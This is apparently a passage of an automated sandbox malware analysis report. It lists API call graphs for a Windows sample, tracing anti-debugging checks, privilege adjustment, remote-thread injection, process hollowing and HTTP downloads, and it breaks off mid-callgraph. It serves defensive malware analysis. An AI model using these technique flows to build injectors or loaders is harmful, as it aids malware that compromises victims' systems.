                                                                                                                                                                                                    • Part of subcall function 00007FF6FDB540E4: CloseHandle.KERNEL32 ref: 00007FF6FDB54249
                                                                                                                                                                                                  • GetProcessHeap.KERNEL32 ref: 00007FF6FDB53037
                                                                                                                                                                                                  • HeapFree.KERNEL32 ref: 00007FF6FDB5304A
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000008.00000002.1439037009.00007FF6FDB51000.00000020.00000400.00020000.00000000.sdmp, Offset: 00007FF6FDB50000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000008.00000002.1438985208.00007FF6FDB50000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000008.00000002.1439083252.00007FF6FDB55000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000008.00000002.1439155653.00007FF6FDB57000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000008.00000002.1439182660.00007FF6FDB58000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000008.00000002.1439226782.00007FF6FDB5A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_8_2_7ff6fdb50000_audiodg.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: lstrcat$Process$CloseCreateFileHandleHeapOpenToken$AdjustAttributesCurrentDirectoryFolderFreeLookupPathPrivilegePrivilegesValue
                                                                                                                                                                                                  • String ID: .x64$chFrWWdQWsLFevUr
                                                                                                                                                                                                  • API String ID: 3992431006-2286007224
                                                                                                                                                                                                  • Opcode ID: cbab157b2d9c68e389ca682648b14c554c0f20e1364e44505b152457a58d70d4
                                                                                                                                                                                                  • Instruction ID: 2fb01873a16136ab0af2dbd9b3fa67a8477c58ade9750d43db1ef54b4041f97d
                                                                                                                                                                                                  • Opcode Fuzzy Hash: cbab157b2d9c68e389ca682648b14c554c0f20e1364e44505b152457a58d70d4
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 8911D6A0A18A8285E750EF18E8443AA77A0FB8A704FD04135D56DC67E9FF3CF0598B80

                                                                                                                                                                                                  Execution Graph

                                                                                                                                                                                                  Execution Coverage:23.1%
                                                                                                                                                                                                  Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                                                  Signature Coverage:0%
                                                                                                                                                                                                  Total number of Nodes:478
                                                                                                                                                                                                  Total number of Limit Nodes:4
                                                                                                                                                                                                  execution_graph 851 7ff63b52345c 911 7ff63b5210a0 851->911 856 7ff63b52347c 1145 7ff63b524264 GetCurrentProcess OpenProcessToken 856->1145 857 7ff63b523474 ExitProcess 861 7ff63b523497 862 7ff63b5234fb 861->862 863 7ff63b5234ac 861->863 868 7ff63b52354c 862->868 869 7ff63b523510 862->869 864 7ff63b5243a4 3 API calls 863->864 865 7ff63b5234b8 864->865 866 7ff63b5234bf 865->866 867 7ff63b5234d2 ExitProcess 865->867 870 7ff63b5243a4 3 API calls 866->870 877 7ff63b523561 868->877 878 7ff63b5235a2 868->878 1160 7ff63b5243a4 CreateMutexExA 869->1160 872 7ff63b5234cb 870->872 872->867 876 7ff63b5234da 872->876 874 7ff63b52352b 1173 7ff63b52327c 874->1173 875 7ff63b523523 ExitProcess 1164 7ff63b5232ec 876->1164 882 7ff63b5243a4 3 API calls 877->882 1178 7ff63b523a74 878->1178 886 7ff63b52356d 882->886 883 7ff63b523530 887 7ff63b523537 Sleep 883->887 888 7ff63b523544 ExitProcess 883->888 884 7ff63b5235a7 1184 7ff63b5233ec GetVersionExW 884->1184 885 7ff63b5234df 890 7ff63b5234e6 Sleep 885->890 891 7ff63b5234f3 ExitProcess 885->891 892 7ff63b52357c 886->892 893 7ff63b523574 ExitProcess 886->893 887->883 890->885 895 7ff63b52327c 18 API calls 892->895 898 7ff63b523581 895->898 896 7ff63b5235ba 901 7ff63b5243a4 3 API calls 896->901 897 7ff63b52360e 7 API calls 899 7ff63b523588 Sleep 898->899 900 7ff63b523595 ExitProcess 898->900 899->898 902 7ff63b5235c6 901->902 903 7ff63b5235e0 ExitProcess 902->903 904 7ff63b5243a4 3 API calls 902->904 905 7ff63b5235d9 904->905 905->903 906 7ff63b5235e8 905->906 907 7ff63b5232ec 45 API calls 906->907 908 7ff63b5235ed 907->908 909 7ff63b523601 ExitProcess 908->909 910 7ff63b5235f4 Sleep 908->910 910->908 1186 7ff63b521000 LoadLibraryA GetProcAddress 911->1186 913 7ff63b52113a 1187 7ff63b521000 LoadLibraryA GetProcAddress 913->1187 915 7ff63b521154 1188 7ff63b521050 LoadLibraryA GetProcAddress 915->1188 917 7ff63b52116e 1189 7ff63b521050 LoadLibraryA GetProcAddress 917->1189 919 7ff63b521188 1190 7ff63b521050 LoadLibraryA GetProcAddress 919->1190 921 7ff63b5211a2 1191 7ff63b521050 LoadLibraryA GetProcAddress 921->1191 923 7ff63b5211bc 1192 7ff63b521050 LoadLibraryA GetProcAddress 923->1192 925 7ff63b5211d6 1193 7ff63b521050 LoadLibraryA GetProcAddress 925->1193 927 7ff63b5211f0 1194 7ff63b521050 LoadLibraryA GetProcAddress 927->1194 929 7ff63b52120a 1195 7ff63b521050 LoadLibraryA GetProcAddress 929->1195 931 7ff63b521224 1196 7ff63b521050 LoadLibraryA GetProcAddress 931->1196 933 7ff63b52123e 1197 7ff63b521000 LoadLibraryA GetProcAddress 933->1197 935 7ff63b521258 1198 7ff63b521000 LoadLibraryA GetProcAddress 935->1198 937 7ff63b521272 1199 7ff63b521000 LoadLibraryA GetProcAddress 937->1199 939 7ff63b52128c 1200 7ff63b521000 LoadLibraryA GetProcAddress 939->1200 941 7ff63b5212a6 1201 7ff63b521050 LoadLibraryA GetProcAddress 941->1201 943 7ff63b5212c0 1202 7ff63b521050 LoadLibraryA GetProcAddress 943->1202 945 7ff63b5212da 1203 7ff63b521050 LoadLibraryA GetProcAddress 945->1203 947 7ff63b5212f4 1204 7ff63b521050 LoadLibraryA GetProcAddress 947->1204 949 7ff63b52130e 1205 7ff63b521050 LoadLibraryA GetProcAddress 949->1205 951 7ff63b521328 1206 7ff63b521050 LoadLibraryA GetProcAddress 951->1206 953 7ff63b521342 1207 7ff63b521050 LoadLibraryA GetProcAddress 953->1207 955 7ff63b52135c 1208 7ff63b521050 LoadLibraryA GetProcAddress 955->1208 957 7ff63b521376 1209 7ff63b521050 LoadLibraryA GetProcAddress 957->1209 959 7ff63b521390 1210 7ff63b521050 LoadLibraryA GetProcAddress 959->1210 961 7ff63b5213aa 1211 7ff63b521050 LoadLibraryA GetProcAddress 961->1211 963 7ff63b5213c4 1212 7ff63b521050 LoadLibraryA GetProcAddress 963->1212 965 7ff63b5213de 1213 7ff63b521050 LoadLibraryA GetProcAddress 965->1213 967 7ff63b5213f8 1214 7ff63b521050 LoadLibraryA GetProcAddress 967->1214 969 7ff63b521412 1215 7ff63b521050 LoadLibraryA GetProcAddress 969->1215 971 7ff63b52142c 1216 7ff63b521050 LoadLibraryA GetProcAddress 971->1216 973 7ff63b521446 1217 7ff63b521050 LoadLibraryA GetProcAddress 973->1217 975 7ff63b521460 1218 7ff63b521050 LoadLibraryA GetProcAddress 975->1218 977 7ff63b52147a 1219 7ff63b521050 LoadLibraryA GetProcAddress 977->1219 979 7ff63b521494 1220 7ff63b521050 LoadLibraryA GetProcAddress 979->1220 981 7ff63b5214ae 1221 7ff63b521050 LoadLibraryA GetProcAddress 981->1221 983 7ff63b5214c8 1222 7ff63b521050 LoadLibraryA GetProcAddress 983->1222 985 7ff63b5214e2 1223 7ff63b521050 LoadLibraryA GetProcAddress 985->1223 987 7ff63b5214fc 1224 7ff63b521050 LoadLibraryA GetProcAddress 987->1224 989 7ff63b521516 1225 7ff63b521050 LoadLibraryA GetProcAddress 989->1225 991 7ff63b521530 1226 7ff63b521050 LoadLibraryA GetProcAddress 991->1226 993 7ff63b52154a 1227 7ff63b521050 LoadLibraryA GetProcAddress 993->1227 995 7ff63b521564 1228 7ff63b521050 LoadLibraryA GetProcAddress 995->1228 997 7ff63b52157e 1229 7ff63b521050 LoadLibraryA GetProcAddress 997->1229 999 7ff63b521598 1230 7ff63b521050 LoadLibraryA GetProcAddress 999->1230 1001 7ff63b5215b2 1231 7ff63b521050 LoadLibraryA GetProcAddress 1001->1231 1003 7ff63b5215cc 1232 7ff63b521050 LoadLibraryA GetProcAddress 1003->1232 1005 7ff63b5215e6 1233 7ff63b521050 LoadLibraryA GetProcAddress 1005->1233 1007 7ff63b521600 1234 7ff63b521050 LoadLibraryA GetProcAddress 1007->1234 1009 7ff63b52161a 1235 7ff63b521050 LoadLibraryA GetProcAddress 1009->1235 1011 7ff63b521634 1236 7ff63b521050 LoadLibraryA GetProcAddress 1011->1236 1013 7ff63b52164e 1237 7ff63b521050 LoadLibraryA GetProcAddress 1013->1237 1015 7ff63b521668 1238 7ff63b521050 LoadLibraryA GetProcAddress 1015->1238 1017 7ff63b521682 1239 7ff63b521050 LoadLibraryA GetProcAddress 1017->1239 1019 7ff63b52169c 1240 7ff63b521050 LoadLibraryA GetProcAddress 1019->1240 1021 7ff63b5216b6 1241 7ff63b521050 LoadLibraryA GetProcAddress 1021->1241 1023 7ff63b5216d0 1242 7ff63b521050 LoadLibraryA GetProcAddress 1023->1242 1025 7ff63b5216ea 1243 7ff63b521050 LoadLibraryA GetProcAddress 1025->1243 1027 7ff63b521704 1244 7ff63b521050 LoadLibraryA GetProcAddress 1027->1244 1029 7ff63b52171e 1245 7ff63b521050 LoadLibraryA GetProcAddress 1029->1245 1031 7ff63b521738 1246 7ff63b521050 LoadLibraryA GetProcAddress 1031->1246 1033 7ff63b521752 1247 7ff63b521050 LoadLibraryA GetProcAddress 1033->1247 1035 7ff63b52176c 1248 7ff63b521050 LoadLibraryA GetProcAddress 1035->1248 1037 7ff63b521786 1249 7ff63b521050 LoadLibraryA GetProcAddress 1037->1249 1039 7ff63b5217a0 1250 7ff63b521050 LoadLibraryA GetProcAddress 1039->1250 1041 7ff63b5217ba 1251 7ff63b521050 LoadLibraryA GetProcAddress 1041->1251 1043 7ff63b5217d4 1252 7ff63b521050 LoadLibraryA GetProcAddress 1043->1252 1045 7ff63b5217ee 1253 7ff63b521050 LoadLibraryA GetProcAddress 1045->1253 1047 7ff63b521808 1254 7ff63b521050 LoadLibraryA GetProcAddress 1047->1254 1049 7ff63b521822 1255 7ff63b521050 LoadLibraryA GetProcAddress 1049->1255 1051 7ff63b52183c 1256 7ff63b521050 LoadLibraryA GetProcAddress 1051->1256 1053 7ff63b521856 1257 7ff63b521050 LoadLibraryA GetProcAddress 1053->1257 1055 7ff63b521870 1258 7ff63b521050 LoadLibraryA GetProcAddress 1055->1258 1057 7ff63b52188a 1259 7ff63b521050 LoadLibraryA GetProcAddress 1057->1259 1059 7ff63b5218a4 1260 7ff63b521050 LoadLibraryA GetProcAddress 1059->1260 1061 7ff63b5218be 1261 7ff63b521050 LoadLibraryA GetProcAddress 1061->1261 1063 7ff63b5218d8 1262 7ff63b521050 LoadLibraryA GetProcAddress 1063->1262 1065 7ff63b5218f2 1263 7ff63b521050 LoadLibraryA GetProcAddress 1065->1263 1067 7ff63b52190c 1264 7ff63b521050 LoadLibraryA GetProcAddress 1067->1264 1069 7ff63b521926 1265 7ff63b521050 LoadLibraryA GetProcAddress 1069->1265 1071 7ff63b521940 1266 7ff63b521050 LoadLibraryA GetProcAddress 1071->1266 1073 7ff63b52195a 1267 7ff63b521050 LoadLibraryA GetProcAddress 1073->1267 1075 7ff63b521974 1268 7ff63b521050 LoadLibraryA GetProcAddress 1075->1268 1077 7ff63b52198e 1269 7ff63b521050 LoadLibraryA GetProcAddress 1077->1269 1079 7ff63b5219a8 1270 7ff63b521050 LoadLibraryA GetProcAddress 1079->1270 1081 7ff63b5219c2 1271 7ff63b521050 LoadLibraryA GetProcAddress 1081->1271 1083 7ff63b5219dc 1272 7ff63b521050 LoadLibraryA GetProcAddress 1083->1272 1085 7ff63b5219f6 1273 7ff63b521050 LoadLibraryA GetProcAddress 1085->1273 1087 7ff63b521a10 1274 7ff63b521050 LoadLibraryA GetProcAddress 1087->1274 1089 7ff63b521a2a 1275 7ff63b521050 LoadLibraryA GetProcAddress 1089->1275 1091 7ff63b521a44 1276 7ff63b521050 LoadLibraryA GetProcAddress 1091->1276 1093 7ff63b521a5e 1277 7ff63b521050 LoadLibraryA GetProcAddress 1093->1277 1095 7ff63b521a78 1278 7ff63b521050 LoadLibraryA GetProcAddress 1095->1278 1097 7ff63b521a92 1279 7ff63b521050 LoadLibraryA GetProcAddress 1097->1279 1099 7ff63b521aac 1280 7ff63b521050 LoadLibraryA GetProcAddress 1099->1280 1101 7ff63b521ac6 1281 7ff63b521050 LoadLibraryA GetProcAddress 1101->1281 1103 7ff63b521ae0 1282 7ff63b521050 LoadLibraryA GetProcAddress 1103->1282 1105 7ff63b521afa 1283 7ff63b521050 LoadLibraryA GetProcAddress 1105->1283 1107 7ff63b521b14 1284 7ff63b521050 LoadLibraryA GetProcAddress 1107->1284 1109 7ff63b521b2e 1285 7ff63b521000 LoadLibraryA GetProcAddress 1109->1285 1111 7ff63b521b48 1286 7ff63b521050 LoadLibraryA GetProcAddress 1111->1286 1113 7ff63b521b62 1287 7ff63b521050 LoadLibraryA GetProcAddress 1113->1287 1115 7ff63b521b7c 1288 7ff63b521050 LoadLibraryA GetProcAddress 1115->1288 1117 7ff63b521b96 1289 7ff63b521050 LoadLibraryA GetProcAddress 1117->1289 1119 7ff63b521bb0 1290 7ff63b521050 LoadLibraryA GetProcAddress 1119->1290 1121 7ff63b521bca 1291 7ff63b521050 LoadLibraryA GetProcAddress 1121->1291 1123 7ff63b521be4 1292 7ff63b521050 LoadLibraryA GetProcAddress 1123->1292 1125 7ff63b521bfe 1293 7ff63b521000 LoadLibraryA GetProcAddress 1125->1293 1127 7ff63b521c18 1294 7ff63b521000 LoadLibraryA GetProcAddress 1127->1294 1129 7ff63b521c32 1295 7ff63b521050 LoadLibraryA GetProcAddress 1129->1295 1131 7ff63b521c4c 1296 7ff63b521050 LoadLibraryA GetProcAddress 1131->1296 1133 7ff63b521c66 1297 7ff63b521050 LoadLibraryA GetProcAddress 1133->1297 1135 7ff63b521c80 1298 7ff63b521050 LoadLibraryA GetProcAddress 1135->1298 1137 7ff63b521c9a 1299 7ff63b521050 LoadLibraryA GetProcAddress 1137->1299 1139 7ff63b521cb4 1300 7ff63b521050 LoadLibraryA GetProcAddress 1139->1300 1141 7ff63b521cce 1142 7ff63b52321c IsDebuggerPresent 1141->1142 1143 7ff63b52322e GetCurrentProcess CheckRemoteDebuggerPresent 1142->1143 1144 7ff63b52322a 1142->1144 1143->1144 1144->856 1144->857 1146 7ff63b52428a GetTokenInformation 1145->1146 1147 7ff63b523481 1145->1147 1301 7ff63b523b54 VirtualAlloc 1146->1301 1156 7ff63b523ce4 GetModuleFileNameW 1147->1156 1149 7ff63b5242bb GetTokenInformation 1150 7ff63b5242e8 CloseHandle 1149->1150 1154 7ff63b524302 AdjustTokenPrivileges CloseHandle 1149->1154 1151 7ff63b523b24 VirtualFree 1150->1151 1152 7ff63b5242fd 1151->1152 1152->1147 1302 7ff63b523b24 1154->1302 1157 7ff63b523d0f PathFindFileNameW wcslen 1156->1157 1158 7ff63b523dd2 wcsncpy 1156->1158 1159 7ff63b523d49 1157->1159 1158->1159 1159->861 1161 7ff63b52351c 1160->1161 1162 7ff63b5243d0 GetLastError 1160->1162 1161->874 1161->875 1162->1161 1163 7ff63b5243dd CloseHandle 1162->1163 1163->1161 1305 7ff63b5238c4 1164->1305 1166 7ff63b5232fd 1309 7ff63b5246e4 1166->1309 1168 7ff63b523357 CreateThread 1168->885 1169 7ff63b523315 1169->1168 1322 7ff63b5240c4 1169->1322 1174 7ff63b5238c4 10 API calls 1173->1174 1175 7ff63b52328c 1174->1175 1361 7ff63b5244b4 1175->1361 1179 7ff63b523744 3 API calls 1178->1179 1180 7ff63b523a9f 1179->1180 1181 7ff63b5238c4 10 API calls 1180->1181 1182 7ff63b523aa9 GetModuleFileNameW 1181->1182 1183 7ff63b523aca 1182->1183 1183->884 1185 7ff63b52341d 1184->1185 1185->896 1185->897 1186->913 1187->915 1188->917 1189->919 1190->921 1191->923 1192->925 1193->927 1194->929 1195->931 1196->933 1197->935 1198->937 1199->939 1200->941 1201->943 1202->945 1203->947 1204->949 1205->951 1206->953 1207->955 1208->957 1209->959 1210->961 1211->963 1212->965 1213->967 1214->969 1215->971 1216->973 1217->975 1218->977 1219->979 1220->981 1221->983 1222->985 1223->987 1224->989 1225->991 1226->993 1227->995 1228->997 1229->999 1230->1001 1231->1003 1232->1005 1233->1007 1234->1009 1235->1011 1236->1013 1237->1015 1238->1017 1239->1019 1240->1021 1241->1023 1242->1025 1243->1027 1244->1029 1245->1031 1246->1033 1247->1035 1248->1037 1249->1039 1250->1041 1251->1043 1252->1045 1253->1047 1254->1049 1255->1051 1256->1053 1257->1055 1258->1057 1259->1059 1260->1061 1261->1063 1262->1065 1263->1067 1264->1069 1265->1071 1266->1073 1267->1075 1268->1077 1269->1079 1270->1081 1271->1083 1272->1085 1273->1087 1274->1089 1275->1091 1276->1093 1277->1095 1278->1097 1279->1099 1280->1101 1281->1103 1282->1105 1283->1107 1284->1109 1285->1111 1286->1113 1287->1115 1288->1117 1289->1119 1290->1121 1291->1123 1292->1125 1293->1127 1294->1129 1295->1131 1296->1133 1297->1135 1298->1137 1299->1139 1300->1141 1301->1149 1303 7ff63b523b48 1302->1303 1304 7ff63b523b35 VirtualFree 1302->1304 1303->1147 1304->1303 1337 7ff63b523744 GetWindowsDirectoryW 1305->1337 1307 7ff63b5238f3 SHGetFolderPathW lstrcatW lstrcatW CreateDirectoryW 1308 7ff63b52395e lstrcatW lstrcatW lstrcatW 1307->1308 1308->1166 1310 7ff63b524731 1309->1310 1311 7ff63b52473e 1310->1311 1312 7ff63b524745 GetFileSize GetProcessHeap RtlAllocateHeap 1310->1312 1311->1169 1313 7ff63b52478e CloseHandle 1312->1313 1314 7ff63b5247a0 ReadFile 1312->1314 1313->1311 1315 7ff63b5247c7 GetProcessHeap HeapFree CloseHandle 1314->1315 1316 7ff63b5247ef 1314->1316 1315->1311 1317 7ff63b524808 GetProcessHeap HeapFree CloseHandle 1316->1317 1319 7ff63b524830 1316->1319 1317->1311 1318 7ff63b52499b GetProcessHeap HeapFree CloseHandle 1318->1311 1319->1318 1320 7ff63b5248eb GetProcessHeap RtlAllocateHeap 1319->1320 1321 7ff63b524934 1320->1321 1321->1318 1342 7ff63b524004 CreateToolhelp32Snapshot 1322->1342 1325 7ff63b5240e4 1326 7ff63b52414b GetCurrentProcess OpenProcessToken 1325->1326 1327 7ff63b524168 LookupPrivilegeValueW 1326->1327 1328 7ff63b5241c2 OpenProcess 1326->1328 1329 7ff63b5241b7 CloseHandle 1327->1329 1330 7ff63b524190 AdjustTokenPrivileges 1327->1330 1331 7ff63b5241ee 1328->1331 1335 7ff63b5241e4 1328->1335 1329->1328 1330->1329 1331->1335 1336 7ff63b524222 WaitForSingleObject 1331->1336 1349 7ff63b522cb8 1331->1349 1333 7ff63b52424f 1333->1168 1334 7ff63b524244 CloseHandle 1334->1333 1335->1333 1335->1334 1336->1326 1336->1335 1338 7ff63b523798 GetVolumeInformationW 1337->1338 1339 7ff63b52378e 1337->1339 1340 7ff63b523814 1338->1340 1339->1338 1341 7ff63b52387e wsprintfW 1340->1341 1341->1307 1343 7ff63b523342 1342->1343 1344 7ff63b52403f Process32FirstW 1342->1344 1343->1325 1345 7ff63b524099 CloseHandle 1344->1345 1346 7ff63b52405e wcscmp 1344->1346 1345->1343 1347 7ff63b524082 Process32NextW 1346->1347 1348 7ff63b524075 1346->1348 1347->1345 1347->1346 1348->1345 1350 7ff63b522d0b 1349->1350 1352 7ff63b522d2b 1350->1352 1353 7ff63b522d4d VirtualAllocEx 1350->1353 1357 7ff63b522a88 1350->1357 1352->1331 1353->1352 1354 7ff63b522d87 WriteProcessMemory 1353->1354 1354->1352 1355 7ff63b522dd0 VirtualProtectEx 1354->1355 1355->1352 1356 7ff63b522e03 CreateRemoteThread 1355->1356 1356->1350 1356->1352 1358 7ff63b522b01 1357->1358 1359 7ff63b522c0a StrStrA 1358->1359 1360 7ff63b522b08 1358->1360 1359->1358 1359->1360 1360->1350 1362 7ff63b5244fd 1361->1362 1363 7ff63b52452b GetLastError 1362->1363 1364 7ff63b52450a 1362->1364 1366 7ff63b52329f CreateThread Sleep 1363->1366 1368 7ff63b524404 GetFileSize 1364->1368 1366->883 1373 7ff63b523b54 VirtualAlloc 1368->1373 1370 7ff63b524430 1371 7ff63b52447a CloseHandle 1370->1371 1372 7ff63b524444 SetFilePointer ReadFile 1370->1372 1371->1366 1372->1371 1373->1370 1374 7ff63b522f9c 1375 7ff63b5238c4 10 API calls 1374->1375 1376 7ff63b522fdb 1375->1376 1377 7ff63b5246e4 16 API calls 1376->1377 1378 7ff63b522fff 1377->1378 1379 7ff63b5240c4 5 API calls 1378->1379 1380 7ff63b523022 1379->1380 1381 7ff63b5240e4 13 API calls 1380->1381 1382 7ff63b523037 GetProcessHeap HeapFree 1381->1382 1441 7ff63b521cdc 1442 7ff63b521d06 InternetOpenW 1441->1442 1443 7ff63b521d40 InternetOpenUrlW 1442->1443 1444 7ff63b521d33 Sleep 1442->1444 1445 7ff63b521d77 InternetOpenUrlW 1443->1445 1446 7ff63b521dc9 HttpQueryInfoA 1443->1446 1444->1442 1445->1446 1447 7ff63b521dae InternetCloseHandle Sleep 1445->1447 1448 7ff63b521df8 InternetCloseHandle InternetCloseHandle Sleep 1446->1448 1449 7ff63b521e1e 1446->1449 1447->1442 1448->1442 1450 7ff63b521e28 InternetCloseHandle InternetOpenUrlW 1449->1450 1451 7ff63b521e85 HttpQueryInfoA GetProcessHeap RtlAllocateHeap 1449->1451 1450->1451 1452 7ff63b521e6a InternetCloseHandle Sleep 1450->1452 1453 7ff63b521eea InternetCloseHandle InternetCloseHandle 1451->1453 1457 7ff63b521f04 1451->1457 1452->1442 1454 7ff63b521f83 1453->1454 1455 7ff63b521f0c InternetReadFile 1456 7ff63b521f5a InternetCloseHandle InternetCloseHandle 1455->1456 1455->1457 1456->1454 1457->1455 1457->1456 1458 7ff63b5230dc 1461 7ff63b5230e5 1458->1461 1459 7ff63b5231d1 1461->1459 1462 7ff63b523c24 RegDeleteKeyW 1461->1462 1463 7ff63b523e24 9 API calls 1461->1463 1464 7ff63b5231c1 Sleep 1461->1464 1465 7ff63b5245c4 1461->1465 1462->1461 1463->1461 1464->1461 1466 7ff63b524612 1465->1466 1467 7ff63b52465a 1466->1467 1471 7ff63b524544 SetFilePointer WriteFile SetEndOfFile 1466->1471 1467->1461 1469 7ff63b52463b CloseHandle 1469->1467 1471->1469 1383 7ff63b5233ac 1386 7ff63b522048 GetModuleFileNameW 1383->1386 1387 7ff63b5220c9 1386->1387 1396 7ff63b5220c4 1386->1396 1388 7ff63b522107 1387->1388 1389 7ff63b52211d 1387->1389 1390 7ff63b52213b 1388->1390 1391 7ff63b522111 1388->1391 1429 7ff63b521f88 ExpandEnvironmentStringsW 1389->1429 1430 7ff63b521fc8 ExpandEnvironmentStringsW 1390->1430 1391->1396 1431 7ff63b522008 ExpandEnvironmentStringsW 1391->1431 1394 7ff63b522132 1394->1396 1397 7ff63b52218d CreateProcessW 1394->1397 1397->1396 1398 7ff63b5221e8 1397->1398 1398->1396 1399 7ff63b52222f GetFileSize 1398->1399 1400 7ff63b522257 CloseHandle 1399->1400 1401 7ff63b52224d 1399->1401 1400->1396 1401->1400 1402 7ff63b522267 VirtualAlloc 1401->1402 1403 7ff63b5222a1 ReadFile 1402->1403 1404 7ff63b522291 CloseHandle 1402->1404 1405 7ff63b5222ce VirtualFree CloseHandle 1403->1405 1406 7ff63b5222f1 CloseHandle GetThreadContext 1403->1406 1404->1396 1405->1396 1407 7ff63b522359 ReadProcessMemory GetModuleHandleA GetProcAddress 1406->1407 1408 7ff63b522341 VirtualFree 1406->1408 1409 7ff63b5223dc 1407->1409 1408->1396 1410 7ff63b5223f8 VirtualAllocEx 1409->1410 1411 7ff63b5223e0 VirtualFree 1409->1411 1412 7ff63b52247b WriteProcessMemory 1410->1412 1413 7ff63b522463 VirtualFree 1410->1413 1411->1396 1414 7ff63b5224b1 VirtualFree 1412->1414 1417 7ff63b5224c9 1412->1417 1413->1396 1414->1396 1415 7ff63b5224ff WriteProcessMemory 1416 7ff63b52258a VirtualFree 1415->1416 1415->1417 1416->1396 1417->1415 1420 7ff63b5225a7 1417->1420 1418 7ff63b522619 RtlCompareMemory 1418->1420 1426 7ff63b52266c 1418->1426 1419 7ff63b522898 WriteProcessMemory SetThreadContext 1421 7ff63b52291e VirtualFree 1419->1421 1422 7ff63b522933 ResumeThread 1419->1422 1420->1418 1420->1419 1421->1396 1423 7ff63b52295a VirtualFree 1422->1423 1424 7ff63b522945 VirtualFree 1422->1424 1423->1396 1424->1396 1425 7ff63b522893 1425->1419 1426->1425 1427 7ff63b52279c ReadProcessMemory WriteProcessMemory 1426->1427 1427->1426 1428 7ff63b522871 VirtualFree 1427->1428 1428->1396 1429->1394 1430->1394 1431->1394 1432 7ff63b52338c 1433 7ff63b522048 35 API calls 1432->1433 1434 7ff63b52339c 1433->1434 1435 7ff63b522f0c CreateMutexA 1436 7ff63b522f4e GetLastError 1435->1436 1437 7ff63b522f31 ReleaseMutex CloseHandle 1435->1437 1439 7ff63b522f78 ReleaseMutex CloseHandle 1436->1439 1440 7ff63b522f5b ReleaseMutex CloseHandle 1436->1440 1438 7ff63b522f90 1437->1438 1439->1438 1440->1438 1472 7ff63b5231ec 1473 7ff63b5231f5 1472->1473 1474 7ff63b52320e 1473->1474 1477 7ff63b52306c 1473->1477 1482 7ff63b522e6c CreateMutexA 1477->1482 1480 7ff63b523087 Sleep CreateThread WaitForSingleObject 1481 7ff63b5230cc Sleep 1480->1481 1481->1473 1483 7ff63b522e98 ReleaseMutex CloseHandle 1482->1483 1484 7ff63b522eb5 GetLastError 1482->1484 1485 7ff63b522ef7 1483->1485 1486 7ff63b522edf ReleaseMutex CloseHandle 1484->1486 1487 7ff63b522ec2 ReleaseMutex CloseHandle 1484->1487 1485->1480 1485->1481 1486->1485 1487->1485

                                                                                                                                                                                                  Callgraph

                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                  • Opacity -> Relevance
                                                                                                                                                                                                  • Disassembly available
                                                                                                                                                                                                  callgraph 0 Function_00007FF63B52E999 1 Function_00007FF63B52E997 2 Function_00007FF63B52359D 3 Function_00007FF63B522F9C 32 Function_00007FF63B523C64 3->32 85 Function_00007FF63B5246E4 3->85 87 Function_00007FF63B5240E4 3->87 102 Function_00007FF63B5238C4 3->102 103 Function_00007FF63B5240C4 3->103 4 Function_00007FF63B52E99B 5 Function_00007FF63B5210A0 49 Function_00007FF63B521050 5->49 67 Function_00007FF63B521000 5->67 6 Function_00007FF63B5243A4 7 Function_00007FF63B52BEAD 8 Function_00007FF63B5233AC 47 Function_00007FF63B522048 8->47 9 Function_00007FF63B5244B4 70 Function_00007FF63B524404 9->70 10 Function_00007FF63B5239B4 11 Function_00007FF63B52A778 12 Function_00007FF63B52A776 13 Function_00007FF63B522978 14 Function_00007FF63B52327C 14->9 14->102 15 Function_00007FF63B52A27F 16 Function_00007FF63B523B84 17 Function_00007FF63B521F88 18 Function_00007FF63B522A88 18->13 19 Function_00007FF63B52A18A 20 Function_00007FF63B52338C 20->47 21 Function_00007FF63B52A258 22 Function_00007FF63B52EC58 23 Function_00007FF63B52DE59 24 Function_00007FF63B52C65C 25 Function_00007FF63B52A05A 26 Function_00007FF63B52345C 26->5 26->6 26->14 33 Function_00007FF63B524264 26->33 39 Function_00007FF63B523A74 26->39 56 Function_00007FF63B52321C 26->56 79 Function_00007FF63B523F14 26->79 86 Function_00007FF63B523CE4 26->86 88 Function_00007FF63B5233EC 26->88 89 Function_00007FF63B5232EC 26->89 27 Function_00007FF63B52A061 28 Function_00007FF63B52D361 29 Function_00007FF63B52B15F 30 Function_00007FF63B52CF65 31 Function_00007FF63B52D365 53 Function_00007FF63B523B54 33->53 57 Function_00007FF63B523B24 33->57 34 Function_00007FF63B52F26A 35 Function_00007FF63B52306C 36 Function_00007FF63B522E6C 35->36 37 Function_00007FF63B52DE70 38 Function_00007FF63B52A772 39->10 44 Function_00007FF63B523744 39->44 39->102 40 Function_00007FF63B524674 41 Function_00007FF63B52C673 42 Function_00007FF63B52D339 43 Function_00007FF63B52D33F 80 Function_00007FF63B523714 44->80 45 Function_00007FF63B524544 46 Function_00007FF63B52DC46 47->17 74 Function_00007FF63B522008 47->74 105 Function_00007FF63B521FC8 47->105 48 Function_00007FF63B52A04E 50 Function_00007FF63B52CD54 51 Function_00007FF63B52DC55 52 Function_00007FF63B52A052 54 Function_00007FF63B52D91D 55 Function_00007FF63B52C91A 58 Function_00007FF63B523C24 59 Function_00007FF63B523E24 60 Function_00007FF63B52ABF9 61 Function_00007FF63B52C2F9 62 Function_00007FF63B52ABF7 63 Function_00007FF63B52C2F7 64 Function_00007FF63B5236FC 65 Function_00007FF63B52ABFB 66 Function_00007FF63B52C501 68 Function_00007FF63B52D904 69 Function_00007FF63B524004 70->53 71 Function_00007FF63B52B508 72 Function_00007FF63B52E008 73 Function_00007FF63B523609 75 Function_00007FF63B522F0C 76 Function_00007FF63B52D615 77 Function_00007FF63B52D915 78 Function_00007FF63B52EC12 81 Function_00007FF63B52A0DD 82 Function_00007FF63B52B3DA 83 